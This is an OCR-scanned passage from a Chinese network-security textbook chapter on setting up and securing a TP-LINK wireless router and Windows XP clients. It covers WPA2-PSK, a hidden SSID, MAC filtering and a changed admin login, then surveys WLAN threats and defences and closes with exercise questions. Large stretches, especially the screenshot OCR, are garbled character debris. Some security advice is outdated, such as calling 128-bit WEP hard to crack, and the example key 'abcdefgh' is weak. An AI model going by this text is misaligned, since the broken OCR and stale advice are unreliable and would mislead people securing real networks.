文件 四 贺 得 邓 查看 0 路 茶具 0 帮助 人 0 


@ 右 -日 - 国 国 入 有 记 时 六 ex 如 全- 学 回 -中 


地 址 Q) | 稳 Mttp://192.168.1.1/ 


素 ; 辟 


本 页 设置 LD 的 于 本 同 络 参 数 
mc 地 址 : 14-m-E4-4E-C2-50 


it: 


ED: 5 255.255.0 国 


区 W] 


图 11-14 LAN 口 设置 


如 TL-WR84IN 一 Wicrosoft 工 
文件 四。 凡 狠 至 查看 收藏 和 ) 工具 GD 帮助 0) 


四 银 - 加 -回国 的 甩 旦 南 


地 址 四) | 址 ] http://l92 .168.1.1/ 


连接 过 起 
PPFoz 连 接 
上 网 了 号: 
上 网 口令 : 
本 人 口令 
季 中 扩 叶 : 
第 二 连接 加 可 用 。 品 双 态 IT OW 才 二 


要 提 代 的 项 要 ， 语 这 振 对 应 的 这 接 模 式 : 
@ 和 这 接 在 有 访问 时 自动 连接 


目 到 绑 等 竺 时 间 : [0 ] 


图 11-15 WAN 口 设置 


说 明 : 运 行 ipconfig/all 命令 可 查看 计算 机 的 无 线 网 卡 的 MAC 地 址 。 

步骤 6: 单 击 左 侧 向 导 菜 单 中 的 “DHCP 服务 器 ”>“DHCP 服务 ”链接 .在 右 侧 窗 格 中 选中 
“启用 ” 单 选 按钮 ,设置 IP 地 址 池 的 开始 地 址 为 192. 168. 1. 100. 结 束 地 址 为 192. 168. 1. 199, 网 
关 为 192. 168. 1.1。 还 可 设置 主 DNS 服务 器 和 备用 DNS 服务 器 的 IP 地 址 ,如 中 国电 信和 的 
浙江 DNS 服务 器 为 60. 191. 134. 196 或 60. 191. 134. 206 .如 图 11-17 所 示 。 单 击 “ 保 存 ” 按 
钮 即 可 完成 。 

对 于 规模 不 大 的 网 络 或 为 了 进一步 提高 无 线 网 络 的 安全 性 .可 以 考虑 使 用 静态 的 IP 地 
址 配置 ,关闭 无 线路 由 器 的 DHCP 服务 。 
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oft Internet Explorer 


文件 中 纺 久 下) 去 看 D 收藏) 工具 QI) 大助 吕 
a-© 国 加 的 Par mx @ 全 -对 


TC 


TIP-LINK 想 


ERETITEEEE 


志 页 设置 WC 地 址 过活 来 控 担 其 机 对本 无 抽 六 的 访问 
CE | 

过 泥 规 则 

和 中 和 ewci 直 访问 李 无 要 网 和 


[GE ne 


图 11-16 “无 线 MAC 地 址 过 滤 ” 设 置 


加 TL-YR84IN 一 Microsoft Internet Explorer 
文件 中” 护 名 于) 查看 WD 收 京 ) 工具 中 帮助 人 D 


四 银 - 回 - 国 国 他 记 r 六 @ 了 从- 学 回 - 


炮 址 四) | 接 Mttp://192. 168.1.1/ 


TP-LUINK 090MV 传 输 速 率 一 买 现 无 线 自 由 连 和 


本 路 由 器 内 嫂 的 DCP 服务 器 窟 自动 也 置 忆 域 同 中 各 计算 机 49TCP/TP 协 议 。 


DNC? 和 务 器 : O 〇 不 8B 用 | 旬 忆 用 
pop 


地 址 油 结束 地 址 : 。 [1732-153.1.199 


地 址 租 央 70] 分钟 《1~29e0 分 钟 ， 摧 省 为 120 分 加》 
Rx: IE Case) 
多 省 域名 : Cm 
主 DIS 服 务 器 : [e0191 134 196 ] (可 法 ) 
各 用 Die 报 务 器: 。 [1511730205] (可 过 ) 


区 到 区 本 


图 11-17 “DHCP 服务 ”设置 


步骤 7: 单 击 左 侧 向 导 莱 单 中 的 “无 线 参 数 ” 一 “基本 设置 "链接 ,在 右 侧 窗 格 中 设置 无 线 
网 络 的 SSID 号 为 tzkj .信道 为 13、 模 式 为 11bgn mixed. 选 中 “开启 无 线 功 能 " 复 选 框 ,取消 
选中 “开启 SSID 广播 ” 复 选 框 ,如 图 11-18 所 示 。 单 击 “ 保 存 ” 按 钮 即 可 完成 。 

不 广播 SSID ,是 为 了 让 无 线 网 络 履 盖 范 围 内 的 用 户 都 不 能 看 到 该 网 络 的 SSID 值 ,从 而 
提高 无 线 网 络 的 安全 性 。 
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电器 风 


文件 中 ”可 强 中 查看 WD 收 训 ) 工具 中 ”帮助 D 
Bom- 日: 国 国 风 Pe 闵 ex 加 全 -学 回 - 


培 址 出) | 痢 Mtp://192 163 4.1/ 


本 页 面 设 置 路 由 着 无 栈 网 络 的 基地 考 数 。 

sp | 
si: 村 请 

模式 : 

So: 


图 11-18 无 线 网 络 基本 设置 


步骤 8: 单 击 左 侧 向 导 菜 单 中 的 “无 线 参 数 " 一 “无 线 安全 设置 "链接 ,在 右 侧 窗 格 中 选中 
“WPA-PSK/ WPA2-PSK” 单 选 按钮 ,选择 认证 类 型 为 WPA2-PSK ,加 密 算法 AES, 并 输入 
PSK 密码 为 abcdefgh, 如 图 11-19 所 示 。 单 击 “ 保 存 ” 按 钮 。 

在 “安全 设置 "菜单 中 ,还 可 设置 是 否 启用 防火 墙 \IP 地 址 过 滤 、 域 名 过 滤 等 ,进一步 提 
高 网 络 的 安全 性 。 

说 明 :WEP 的 安全 性 有 限 , 且 目前 已 有 破解 方法 ,在 实际 使 用 中 不 宜 采 用 。 


加 le 


马 TL-WYR84IN - 下 
文件 ) 出 辑 下 ) 查看 WD 收 着 他 ) 工具 上 帮助 人 


于 -日 国 国 入 er 六 wex 加 全 -学 


雹 柱 m 息 http://192 168.4.1/ 


TP-LINK 


©O 不 开 B 无 线 安全 


© mp-PsErpie-rSK 
warsr 


加 克基 法 : EE 


rr: 


《863 个 SCII 殉 字符 或 8~64 个 十 六 进 制 字符 》 


相宜 更 新 时: 


《单位 为 秒 ， 最 小 导 为 0 ， 不 更 新 则 为 0 


© ww 


图 11-19 无 线 安全 设置 
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步骤 9: 因为 默认 的 登录 用 户 名 (admin) 和 口令 (admin) 很 不 安全 ,可 单 击 左 侧 向 导 菜 
单 中 的 “系统 工具 ”一 “修改 登录 口令 ”链接 ,在 右 侧 窗 格 中 修改 登录 用 户 名 和 口令 ， 
如 图 11-20 所 示 。 单 击 “ 保 存 ” 按 钮 。 


本 页 修 避 系统 冲 理 员 的 用 户 各 及 口令 。 
原 用 户 名 : FT 
原 口令 : Er 
新 用 户 和 名: yadnin 
i 
确认 新 口令 ; 
esa 


图 11-20 修改 系统 管理 员 的 用 户 名 及 口令 


步骤 10: 单 击 左 侧 向 导 菜 单 “ 运 行 状 态 ”, 可 查看 无 线路 由 器 的 当前 状态 (包括 版 本 信 
息 .LAN 口 状态 .WAN 口 状态 .无线 状态 .WAN 口 流量 统计 等 状态 信息 ), 如 图 11-21 所 示 。 
步骤 11: 至 此 ,无 线路 由 器 的 设置 基本 完成 ,重新 启动 路 由 器 ,使 以 上 设置 生效 。 然 后 
拔除 PC1 计算 机 到 无 线路 由 器 之 间 的 直通 网 线 ,或 停 用 有 线 网 卡 。 
Er 查看 0 中 二 工具 中 帮助 t 
四 银 - 加 - 国 国 从 用时 广 spx 已 语 - 和 日 -已 


EECETTITTTCTIT 


TIP-LINK i 让 喜 现 无 线 自 由 连 扩 


当前 软件 版 本 : 。 4.17.12 Boild 110705 Rel 382in 
当前 硬件 版 本 : 。 YEB4I 8.0 00000000 


Mc 地 址 : 14-2B-P-4E-C2-50 
19e.168.1.1 


14- 卫 -到 -4E-C2-51 
Hi.3.91.48 

255 255 255.0 

TE 

211 140.13 188 , 211.140.188. 188 


0 ao) oo:s 。 [ 醉 酸 ] 


CE TT ~ 
> 


emt 
图 11-21 运行 状态 
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(2) 安全 配置 PC1 计算 机 的 无 线 网 络 

步骤 1: 在 PC1 计算 机 上 安装 无 线 网 卡 和 相应 的 驱动 程序 后 ,设置 该 无 线 网 卡 自动 获 
得 IP 地 址 。 如 果 无 线路 由 器 中 关闭 了 DHCP 服务 , 则 需 手 动 设置 无 线 网 卡 的 IP 地 址 。 

无 线 网 卡 安装 成 功 后 ,在 桌面 任务 栏 上 会 出 现 无 线 网 络 连接 图 标明 。 

可 用 无 线 网 卡 的 客户 端 程序 ,也 可 用 Windows XP 来 配置 无 线 网 络 。 如 果 用 Windows 
XP 来 自动 配置 , 需 启 动 Wireless Zero Configuration (无 线 零 配置 ) 组 件 服 务 。 下 面 用 
Windows XP 来 配置 无 线 网 络 。 

步骤 2: 双击 “控制 面板 ”中 的 “管理 工具 ”图 标 ,打开 “管理 工具 ”窗口 。 再 双击 “组 件 服 
务 ”" 图 标 ,打开 “组 件 服务 窗口。 选择 左 侧 窗 格 中 的 “服务 (本 地 )” 选 项 ,在 右 侧 窗 格 中 向 下 
拖 动 垂直 滚动 条 ,找到 并 右 击 Wireless Zero Configuration 选项 ,在 弹出 的 快捷 菜单 中 选择 
“属性 ”命令 ,打开 “Wireless Zero Configuration 的 属性 (本 地 计算 机 ) ”对话 框 。 在 “常规 " 选 
项 卡 中 ,选择 启动 类 型 为 “自动 *, 如 图 11-22 所 示 , 单 击 “ 启 动 ”按钮 ,再 单 击 “ 确 定 ” 按 钮 。 

步骤 3: 布 击 桌面 上 的 “网 上 邻居 "图标 ,在 弹出 的 快捷 菜单 中 选择 “属性 "命令 ,打开 “网 
络 连接 ”窗口 ,如 图 11-23 所 示 。 


Configuration 的 属性 (本 地 计算 机 ) 厅 | 区 
重山 [天 录 | 人 饭 复 [依存 关系 | 

服务 名 黎 ， zcswe 

里 示 名 称 0D: Jiraieas Zero Confiee otion 

的 述 四 ) 的 502 7 通 也 用 提 洪 自 二 忆 置 


可 执行 文件 的 路 径 0 
VIRDONS Sys Un 3Z\ svehost ere -kK nalsves 


局 动 芝 型 


当 从 此 处 启动 服务 时 ， 悠 可 指定 所 适用 的 司 动 参数 、 


图 11-23 “网 络 连接 ”窗口 
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步骤 4: 右 击 “ 无 线 网 络 连 接 " 图 标 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,打开 “无 线 网 
络 连接 属性 ”对 话 框 。 在 “无 线 网 络 配置 ”选项 卡 中 .选中 “用 Windows 配置 我 的 无 线 网 络 
设置 " 复 选 框 ,如 图 11-24 所 示 。 

步骤 5: 单 击 “ 高 级 "按钮 ,打开 “高 级 ”对 话 框 ,如 图 11-25 所 示 。 选 中 “任何 可 用 的 网 络 
(首选 访问 点 )” 单 选 按 钮 ,再 单 击 “ 关 闭 ” 按 钮 ,返回 “无 线 网 络 连 接 属性 ”对 话 框 。 


无线 网 络 连 控 属性 


可 用 网 络 0 
人 


首先 网 络 四) 
现下 面 的 顺序 


自动 这 援 到 一 个 可 用 网 络 


口 贡 功 问 页 哇 构 ) 网 络 &) 
〇 人 朗 计 芷 机 于 it 禾 机 哇 定 ) C) 


[Sa 


CD 
图 11-24 “无 线 网 络 配置 "选项 卡 


图 11-25 “高 级 ”对 话 框 


步骤 6: 单 击 “ 添 加 ”按钮 ,打开 “无 线 网 络 属性 ”对 话 框 。 在 “关联 ”选项 卡 中 ,设置 网 络 
名 (SSID) 为 tzkj. 并 选中 “即使 此 网 络 未 广播 ,也 进行 连接 " 复 选 框 ,取消 选中 “自动 为 我 提供 
此 密 钥 " 复 选 框 ,选择 网 络 身份 验证 方式 为 WPA2-PSK .数据 加 密 方式 为 AES, 在 “网 络 密 
钥 ” 和 "确认 网 络 密 钥 "文本 框 中 输入 密 钥 (如 abcdefgh) ,如 图 11-26 所 示 。 


注意 : 网 络 名 (SSID) 和 网 络 密 钥 的 设置 必须 与 无 线路 由 器 中 的 设置 一 致 。 


步骤 7: 在 “连接 ”选项 卡 中 ,选中 “ 当 此 网 络 在 区 域内 时 连接 " 复 选 框 ,如 图 11-27 所 示 ， 
单 击 “ 确 定 ” 按 钮 .返回 “无 线 网 络 连 接 属性 ”对 话 框 。 此 时 “首选 网 络 " 列 表 框 中 出 现 了 “tzkj 
(自动 ) 选项 ,如 图 11-28 所 示 。 
无 线 网 络 尾 性 
EE EL 
同 络 名 SSID) 0D) tj 


回 即 使 此 网络 未 广播 ,也 进行 连接 
无 烧 同 络 宪 铀 


一 旦 检 生 到 此 网 ，Windows 可 以 自动 连接 、 
此 网 络 要 求 下 列 密 铀 : 


ET rT 
网 络 身 从 验证) [Fe 
数据 加 要 四) 


自动 连接 


| 口 汪 要 EPEeHRiHSEHUO Na) Fy ,未 合 用 天 二 


CE jC ] 


图 11-26 “关联 ”选项 卡 


图 11-27 “连接 ”选项 卡 
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十 无 线 网 络 连接 属性 


| 回 用 Windors 配置 我 的 无 线 网 络 设置 外 
可 用 网 络 0D) 
可 才 有 AREA 有关 更 乡 信 外 :请 
查看 无 线 网 络 


首选 网 络 EE) 
按 下 面 的 顺序 自动 连接 到 一 个 可 用 网 络 


| ED | 


图 11-28 “无 线 网 络 连接 属性 ”对话 框 


步骤 8: 单 击 * 确 定 "按钮 。 等 一 会 儿 , 桌 面 任务 栏 上 的 无 线 网 络 连接 图 标 由 驱 变 为 轧 ， 
表示 该 计算 机 已 自动 接 入 无 线 网 络 。 

(3) 安全 配置 PC2、PC3 计算 机 的 无 线 网 络 

步骤 1: 在 PC2 计算 机 上 ,重复 上 述 步 骤 1 一 步骤 8, 完成 PC2 计算 机 无 线 网 络 的 设置 。 

步骤 2: 在 PC3 计算 机 上 ,重复 上 述 步 骤 1 一 步骤 8 ,完成 PC3 计算 机 无 线 网 络 的 设置 。 

(4) 连通 性 测试 

步骤 1: 在 PC1、PC2 和 PC3 计算 机 上 运行 ipconfig 命令 ,查看 并 记录 PC1、PC2 和 了 PC3 
计算 机 无 线 网 卡 的 IP 地 址 。 

PC1 计算 机 无 线 网 卡 的 IP 地 址 : 

PC2 计算 机 无 线 网 卡 的 IP 地 址 : 

PC3 计算 机 无 线 网 卡 的 IP 地 址 : a 

步骤 2: 在 PC1 计算 机 上 ,依次 运行 “ping PC2 计算 机 无 线 网 卡 的 IP 地 址 ”和 “ping 
PC3 计算 机 无 线 网 卡 的 IP 地址 ”命令 ,测试 与 PC2 和 PC3 计算 机 的 连通 性 。 

步骤 3: 在 PC2 计算 机 上 ,依次 运行 “ping PC1 计算 机 无 线 网 卡 的 IP 地 址 ”和 “ping 
PC3 计算 机 无 线 网 卡 的 IP 地 址 ”命令 ,测试 与 PC1 和 PC3 计算 机 的 连通 性 。 

步骤 4: 在 PC3 计算 机 上 ,依次 运行 “ping PC1 计算 机 无 线 网 卡 的 IP 地 址 ”和 “ping 
PC2 计算 机 无 线 网 卡 的 IP 地 址 ”命令 ,测试 与 PC1 和 PC2 计算 机 的 连通 性 。 


115 拓展 提高 : 无线 局 域 网 的 安全 性 


当 用 户 对 WLAN 的 期 望 日 益 升 高 时 ,其 安全 问题 随 着 应 用 的 深入 表露 无 遗 , 并 成 为 制 
约 WLAN 发 展 的 主要 瓶颈 。 
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1. 威胁 无 线 局 域 网 安全 的 因素 


首先 ,应 该 被 考虑 的 问题 是 ,由 于 WLAN 是 以 无 线 电 波 作为 传输 媒介 ,因此 无 线 网 络 
存在 着 难以 限制 网 络 资源 的 物理 访问 ,无 线 网 络 信号 可 以 传播 到 预期 的 方位 以 外 的 地 域 , 具 
体 情 况 要 根据 建筑 材料 和 环境 而 定 。 这 样 就 使 得 在 网 络 覆 盖 范 围 内 都 是 WLAN 的 接 入 
点 ,给 入 侵 者 有 机 可 乘 , 可 以 在 预期 范围 以 外 的 地 方 访 问 WLAN, 窃 听 网 络 中 的 数据 ,应 用 
各 种 攻击 手段 对 无 线 网 络 进行 攻击 ,当然 这 是 在 人 侵 者 拥有 了 网 络 访问 权 之 后 。 

其 次 ,由 于 WLAN 还 是 符合 所 有 网 络 协议 的 计算 机 网 络 , 所 以 计算 机 病毒 一 类 的 网 络 
威胁 因素 同样 也 威胁 着 所 有 WLAN 内 的 计算 机 ,甚至 会 产生 比 普通 网 络 更 加 严重 的 后 果 。 

因此 ,WLAN 中 存在 的 安全 威胁 因素 主要 有 :窃听 、 截 取 或 者 修改 传输 数据 .置信 攻击 、 
拒绝 服务 等 。 

IEEE 802. 1x 认证 协议 发 明 者 Vipin Jain 接受 媒体 采访 时 表示 :“ 谈 到 无 线 网 络 , 企 业 
的 IT 经理 人 最 担心 两 件 事 :第 一 ,市面 上 的 标准 与 安全 解决 方案 太 多 ,使 得 用 户 无 所 适 从 ; 
第 二 ,如 何 避 免 网 络 遭 到 入 侵 或 攻击 ? 无 线 媒 体 是 一 个 共享 的 媒介 ,不 会 受 限 于 建筑 物 实体 
界线 ,因此 有 人 要 入 侵 网 络 可 以 说 十 分 容易 。" 因 此 WLAN 的 安全 措施 还 是 任 重 而 道 远 。 


2. 无 线 局 域 网 的 安全 措施 


(1) 采用 无 线 加 密 协议 防止 未 授权 用 户 访问 

保护 无 线 网 络 安 全 的 最 基本 手段 是 加 密 , 通 过 简单 设置 AP 和 无 线 网 卡 等 设备 ,就 可 以 
启用 WEP 加 密 。WEP 是 对 无 线 网 络 上 的 流量 进行 加 密 的 一 种 标准 方法 。 许 多 无 线 设备 
厂商 为 了 方便 安装 产品 ,交付 设备 时 关闭 了 WEP 功能 。 但 一 旦 采用 这 种 做 法 ,黑客 就 能 利 
用 无 线 嗅 探 器 直接 读 取 数据 。 建 议 经 常 对 WEP 密 钥 进行 更 换 , 在 条 件 允 许 的 情况 下 启用 
独立 的 认证 服务 为 WEP 自动 分 配 密 钥 。 另 外 一 个 必须 注意 的 问题 就 是 用 于 标识 每 个 无 线 
网 络 的 服务 集 标识 CSSID) ,在 部 署 无 线 网 络 的 时 候 一 定 要 将 出 厂 时 的 默认 SSID 更 换 为 自 
定义 的 SSID。 现 在 的 大 部 分 AP 都 支持 屏蔽 SSID 广播 ,除非 有 特殊 理由 ,否则 应 该 禁用 
SSID 广播 ,这 样 可 以 减少 无 线 网 络 被 发 现 的 可 能 。 

但 是 目前 IEEE 802. 11 标准 中 的 WEP 安全 解决 方案 在 15 分 钟 内 就 可 被 攻破 ,已 被 广 
泛 证 实 不 安全 ,所 以 应 采用 支持 128 位 的 WEP, 破 解 128 位 的 WEP 是 相当 困难 的 。 同 时 也 
要 定期 更 改 WEP 密 钥 ,保证 无 线 局 域 网 的 安全 。 如 果 设 备 提供 了 动态 WEP 功能 ,最 好 应 
用 动态 WEP。 值 得 庆幸 的 是 , Windows XP 本 身 就 提供 了 这 种 支持 ,可 以 选中 WEP 选项 
“自动 为 我 提供 这 个 密 钥 ”。 同 时 ,应 该 使 用 WPA/WPA2、IPSec、VPN、SSH 或 其 他 WEP 
的 替代 方法 ,不 要 仅 使 用 WEP 来 保护 数据 。 

(2) 改变 服务 集 标 识 符 并 且 禁 止 SSID 广播 

SSID 是 无 线 接 人 的 身份 标识 符 ,用户 用 它 来 建立 与 接 人 点 之 间 的 连接 。 这 个 身份 标识 
符 是 由 通信 设备 制造 商 设置 的 .并 且 每 个 厂商 都 用 自己 的 默认 值 。 例 如 ,3COM 的 设备 都 
用 101。 因 此 ,知道 这 些 标识 符 的 黑客 可 以 很 容易 不 经 过 授权 就 可 享受 无 线 服务 ,这 需要 给 
每 个 无 线 接 入 点 设置 一 个 唯一 并 且 难 以 推测 的 SSID。 如 果 可 能 .还 应 该 禁止 SSID 向 外 广 
播 。 这样, 无 线 网 络 就 不 能 够 通过 广播 的 方式 来 吸纳 更 多 用 户 。 当 然 这 并 不 是 说 网 络 不 可 
用 ,只 是 它 不 会 出 现在 可 使 用 网 络 的 名 单 中 。 
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(3) 静态 IP 地 址 与 MAC 地 址 绑 定 

无 线路 由 器 或 AP 在 分 配 IP 地 址 时 ,通常 是 默认 使 用 DHCP 服务 , 即 动态 分 配 IP 地 
址 ,这 对 无 线 网 络 来 说 是 有 安全 隐患 的 .“ 不 法 分子 只 要 找到 了 无 线 网 络 ,就 可 以 通过 
DHCP 而 得 到 一 个 合法 的 IP 地 址 ,由 此 就 进入 了 无 线 局 域 网 中 。 因 此 ,建议 关闭 DHCP 服 
务 ,为 每 台 计 算 机 分 配 固定 的 静态 IP 地 址 ,然后 再 把 这 个 IP 地 址 与 该 计算 机 网 卡 的 MAC 
地 址 进行 绑 定 ,这 样 就 能 大 大 提升 网 络 的 安全 性 .。“ 不 法 ?分子 不 易 得 到 合法 的 IP 地 址 , 即 
使 得 到 了 ,因为 还 要 验证 绑 定 的 MAC 地 址 ,相当 于 两 重 关卡 。 设 置 方法 是 首先 在 无 线路 由 
器 或 AP 的 设置 中 关闭 “DHCP 服务 ”, 然 后 激活 * 固 定 DHCP” 功 能 ,把 各 计算 机 的 名 称 ( 即 
Windows 系统 属性 里 的 “计算 机 描述 ”) .以 后 要 固定 使 用 的 IP 地 址 ,网 卡 的 MAC 地址 都 如 
实 填写 好 ,最 后 单 击 * 执 行 ? 按 钮 就 可 以 了 。 

(4) VPN 技术 在 无 线 网 络 中 的 应 用 

对 于 安全 性 要 求 高 的 或 大 型 的 无 线 网 络 ,VPN 方案 是 一 个 更 好 的 选择 。 因 为 在 大 型 无 
线 网 络 中 ,维护 工作 站 和 AP 的 WEP 加 密 密 钥 ,AP 的 MAC 地 址 列表 等 都 是 非常 艰巨 的 管 
理 任务 。 

对 于 无 线 商 用 网 络 , 基 于 VPN 的 解决 方案 是 当今 WEP 机 制 和 MAC 地 址 过 滤 机 制 的 
最 佳 替代 者 。VPN 方案 已 经 广泛 应 用 于 Internet 远程 用 户 的 安全 接 入 。 在 远程 用 户 接 入 
的 应 用 中 ,VPN 在 不 可 信和 的 网 络 (Internet) 上 提供 一 条 安全 、 专 用 的 通道 或 者 隧道 。 各 种 隧 
道 协 议 , 包 括 点 对 点 的 隧道 协议 和 第 二 层 隧道 协议 都 可 以 与 标准 的 、 集 中 的 认证 协议 一 起 使 
用 。 同 样 ,VPN 技术 可 以 应 用 在 无 线 的 安全 接 入 上 ,在 这 个 应 用 中 ,不 可 信 的 网 络 是 无 线 网 
络 。AP 可 以 被 定义 成 无 WEP 机 制 的 开放 式 接 入 (各 AP 仍 应 定义 成 采用 SSID 机 制 把 无 
线 网 络 分 割 成 多 个 无 线 服务 子 网 ) ,VPN 服务 器 提供 网 络 的 认证 和 加 密 ,并 充当 局 域 网 网 络 
内 部 。 与 WEP 机 制 和 MAC 地 址 过 滤 接 和 人 不同 .VPN 方案 具有 和 较 强 的 扩充 、 升 级 性 能 ,可 
应 用 于 大 规模 的 无 线 网 络 。 

(5) 无 线 入 侵 检 测 系 统 

无 线 入 侵 检 测 系统 同 传统 的 入 侵 检 测 系统 类 似 , 但 无 线 入 侵 检 测 系统 增加 了 无 线 局 域 
网 的 检测 和 对 破坏 系统 反应 的 特性 。 如 今 人 侵 检测 系统 已 用 于 在 无 线 局 域 网 中 监视 和 分 析 
用 户 的 活动 ,判断 入 侵 事件 的 类 型 ,检测 非法 的 网 络 行为 ,对 异常 的 网 络 流量 进行 报警 。 无 
线 和 人 侵 检测 系统 不 但 能 找 出 入 侵 者 ,还 能 加 强 安全 策略 。 通 过 使 用 强 有 力 的 安全 策略 ,会 使 
无 线 局 域 网 更 安全 。 

(6) 采用 身份 验证 和 授权 

当 攻 击 者 了 解 网 络 的 SSID 网络 的 MAC 地 址 或 甚至 WEP 密 钥 等 信息 时 ,他 们 可 能 尝 
试 建立 与 AP 的 关联 。 目 前 ,可 以 使 用 3 种 方法 在 用 户 建立 与 无 线 网 络 的 关联 前 对 他 们 进 
行 身份 验证 。@D 开 放 身份 验证 通常 意味 着 只 需要 向 AP 提供 SSID 或 正确 的 WEP 密 钥 。 
开放 身份 验证 的 问题 在 于 ,如 果 没 有 其 他 的 保护 或 身份 验证 机 制 ,那么 无 线 网 络 将 是 完全 开 
放 的 ,就 像 其 名 称 所 表示 的 。 回 共享 密 钥 身份 验证 机 制 类 似 于 ”口令 -响应 ”身份 验证 系统 。 
在 STA( 工 作 站 ) 与 AP 共享 同一 个 WEP 密 钥 时 使 用 这 一 机 制 。STA 向 AP 发 送 申请 , 然 
后 AP 发 回 口令 。 接 着 ,STA 利用 口令 和 加 密 的 响应 进行 回复 。 这 种 方法 的 漏洞 在 于 口令 
是 通过 明文 传输 给 STA 的 ,因此 如 果 有 人 能 够 同时 截取 口令 和 响应 ,那么 他 们 就 可 能 找到 
用 于 加 密 的 密 钥 。@ 还 可 采用 其 他 的 身份 验证 /授权 机 制 ( 如 使 用 802. 1x、VPN 或 数字 证 
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书 ) 对 无 线 网 络 用 户 进行 身份 验证 和 授权 。 使 用 客户 端 数字 证 书 可 以 使 攻击 者 几乎 无 法 获 
得 访问 权限 。 

(7) 其 他 安全 措施 

除了 上 述 的 安全 措施 之 外 ,还 可 以 采取 其 他 安全 技术 。 例 如 ,设置 第 三 方 数据 加 密 方 
案 , 即 使 信号 被 非法 用 户 窃听 ,他 们 也 难以 理解 其 中 的 内 容 ; 可 以 通过 加 强 企业 内 部 管理 等 
方法 来 加 强 WLAN 的 安全 性 。 

无 线 网 络 应 用 越 来 越 广泛 ,但 是 随 之 而 来 的 网 络 安全 问题 也 越 来 越 突 出 。 以 上 分 析 了 
WLAN 的 不 安全 因素 ,针对 不 安全 因素 给 出 了 可 采取 的 安全 措施 .有 效 地 防范 窃听 截取 或 
者 修改 传输 数据 、 置 信 攻 击 、 拒 绝 服务 等 的 攻击 ,但 是 由 于 现在 各 个 无 线 网 络 设 备 生 产 厂商 
生产 的 设备 的 功能 不 一 样 ,所 以 上 面 介绍 的 一 些 安全 措施 也 许 在 不 同 的 设备 上 会 不 一 样 。 
采用 以 上 安全 措施 ,能 够 保证 无 线 网 络 内 的 用 户 的 信息 和 传输 消息 的 安全 性 和 保密 性 ,有 效 
地 维护 无 线 局 域 网 的 安全 。 


116 习 题 
一 、 选 择 题 
1. IEEE 802. 11 标准 定义 了 
A. 无 线 局 域 网 技术 规范 B. 电费 调制解调器 技术 规范 
C. 光纤 局 域 网 技术 规范 D. 宽带 网 络 技术 规范 
2. 802. 11b 定义 了 使 用 跳 频 扩 频 技术 的 无 线 局 域 网 标准 ,传输 速率 为 1Mbps、2Mbps、 
5.5Mbps 与 Mbps。 
A. 10 B. 11 C. 20 D. 54 


3. IEEE 802. 11 使 用 的 传输 技术 为 
A. 红外 、 跳 频 扩 频 与 蓝牙 
B. 跳 频 扩 频 、 直 接 序列 扩 频 与 蓝牙 
C. 红外 、 直 接 序列 扩 频 与 蓝牙 
D. 红外 、 跳 频 扩 频 与 直接 序列 扩 频 
4. 无 线 网 络 接 入 点 称 为 
A. 无 线 AP B. 无 线路 由 器 C. 无 线 网 卡 D. WEP 


5. 关于 Ad- Hoc 网 络 的 描述 中 ,错误 的 是 。 

A. 没有 固定 的 路 由 器 B. 需要 基站 

C. 具有 动态 搜索 能 力 D. 适用 于 紧急 救援 等 场合 
6. 关于 Ad- Hoc 网 络 的 描述 中 ,错误 的 是 。 


A. 是 一 种 对 等 的 无 线 移动 网 络 B. 在 WLAN 的 基础 上 发 展 起 来 


C. 采用 无 基站 的 通信 模式 D. 在 军事 领域 应 用 广泛 
7. IEEE 802. 11 技术 和 蓝牙 技术 可 以 共同 使 用 的 无 线 信道 频 点 是 
A. 800MHz B. 2.4GHz C. 5GHz D. 10GHz 


303 


网 络 安全 技术 项 目 化 教程 


8. 关于 无 线 局 域 网 的 描述 中 ,错误 的 是 四 
A. 采用 无 线 电 波 作为 传输 媒介 B. 可 以 作为 传统 局 域 网 的 补充 
C. 可 以 支持 1Gbps 的 传输 速率 D. 协议 标准 是 IEEE 802. 11 
9. 无 线 局 域 网 中 使 用 的 SSID 是 % 
A. 无 线 局 域 网 的 设备 名 称 B. 无 线 局 域 网 的 标识 符号 
C. 无 线 局 域 网 的 入 网 口令 D. 无 线 局 域 网 的 加 密 符号 
10. 以 下 不 属于 无 线 加 密 标准 。 
A. DES B. WEP C. WPA D. WPA2 
二 、 填空 题 
1. 在 WLAN 无 线 局 域 网 中 ， 是 最 早 发 布 的 基本 标准 ， 和 标 
准 的 传输 速率 都 达到 了 54Mbps， 和 标准 是 工作 在 免费 频段 上 的 。 
2. 在 无 线 网 络 中 ,除了 WLAN 外 ,其 他 的 还 有 和 等 几 种 无 线 网 络 
技术 。 
3. 无 线 网 络 设 备 主要 有 六 : 和 等 。 
4. IEEE 802. 11x 系列 标准 主要 有 > 和 4 种 。 
5. 无 线 加 密 标准 主要 有 和 3 种 。 
三 、 简 答题 


1. 无 线 局 域 网 的 物理 层 有 哪些 标准 ? 

2. 常用 的 无 线 局 域 网 设备 有 哪些 ? 它们 各 自 的 功能 是 什么 ? 

3. 无 线 局 域 网 的 网 络 结构 有 哪 几 种 ?它们 有 何 区 别 ? 

4. 无 线 加 密 标准 WEP .WPA 、WPA2 有 何 区 别 ? 哪个 安全 性 最 高 ? 

四 、 操 作 练习 题 

分 别 用 WEP、WPA、WPA2 加 密 标 准 设置 无 线 网 卡 和 无 线路 由 器 ,并 测试 其 连通 性 。 
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